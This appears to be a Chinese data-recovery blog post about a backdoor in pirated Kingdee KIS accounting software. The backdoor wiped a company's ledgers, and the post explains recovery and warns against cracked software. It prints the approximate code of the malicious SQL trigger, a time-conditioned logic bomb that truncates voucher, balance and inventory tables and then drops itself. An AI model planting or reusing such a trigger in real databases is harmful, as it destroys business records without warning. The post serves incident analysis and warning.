[重要通告]如您遇疑難雜癥,本站支持知識付費業務,掃右邊二維碼加博主微信,可節省您寶貴時間哦!

近日在百度搜索來的一個客戶，描述了一下自己用的金蝶KIS 12.2/12.3 專業版，網上下載的盜版，本想著用幾年后就買正版或者找一個靠譜的版本使用，發現并無大礙，一直用到了2021年，用了近6年，2021年底早上進公司發現數據全部被篡改，如下圖

數據恢復故障描述

看了一下客戶的財務電腦，是XP的系統，果然很老了，被盜版補丁留下的后門入侵修改了所有數據，刪除了所有備份！ 畢竟做了這么多年的賬，突然要付之東流，很是費解；

使用破解版財務軟件，破解者破解后內藏了后門，清空所有數據的觸發器。用了幾年時間后，后門觸發器被激活，刪除了所有 科目余額表、存貨余額、存貨往來明細賬、修改了所有 總賬憑證、業務憑證、會計科目等，這樣才可以所要更多的金額，說明做這漏洞的人，心機很重；

【臨時處理方法】

此時建議立即停止SQL服務，分離數據庫源文件，復制拷貝備份處理！切勿重裝金蝶軟件，切勿重裝SQLserver！！如還原其他備份，需事先拷貝 事故后第一手文件，進行備份。不要用賬套管理器進行備份，那樣是沒用的哦；

【數據恢復過程】

接到電話后，客戶發來遭后門修改數據庫文件，立即組織對數據庫分析工作，發現數據庫內有一個后門觸發器?t_log_autoNumbe ，大致代碼內容為：

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry ?--刪除總賬憑證
TRUNCATE TABLE t_balance --刪除科目余額表
if @FVersion=‘8.0‘ ?--版本大于8.0
TRUNCATE TABLE icstockbillEntry --刪除存貨出入庫明細賬
else
TRUNCATE TABLE t_cc_stockbillEntry --刪除出入庫存貨明細賬
drop trigger t_log_AutoNumber
end
end

GO

1．對故障盤進行全盤鏡像，對mdf文件進行備份，防止二次造成破壞。

2．對鏡像盤進行掃描重組，對刪除的表進行字段分析。

3．對mdf進行底層數據分析，與表結構進行匹配。

4．通過程序的匹配，找到所有刪除表的原始ID。

5．通過ID和新表結構，對數據進行提取，生成SQL 腳本。

6．把SQL腳本附加到新的數據庫中。

7．把未刪除的表的數據進行遷移。

【恢復結果】：發回給客戶測試驗收，反饋數據基本正確，能恢復這個程度，也實屬困難，客戶很滿意！得到客戶的極大好評。

【溫馨提示】：使用網上隨便下載的破解版軟件，危害很大；居心不良的破解者，可能會留下后門木馬，刪除修改數據，敲詐錢財。如果商用，請使用正版軟件；如經濟實力不允許，也不要到處下載軟件所使用；

PS：好好的軟件，為啥免費？還不是為了后期讓你繳費，說白了就是讓你支付更多的錢財；1、正版 2、找有技術或者技術支持的；

問題未解決？付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信

所寫所說，是心之所感，思之所悟，行之所得；文當無敷衍，落筆求簡潔。 以所舍，求所獲；有所依，方所成！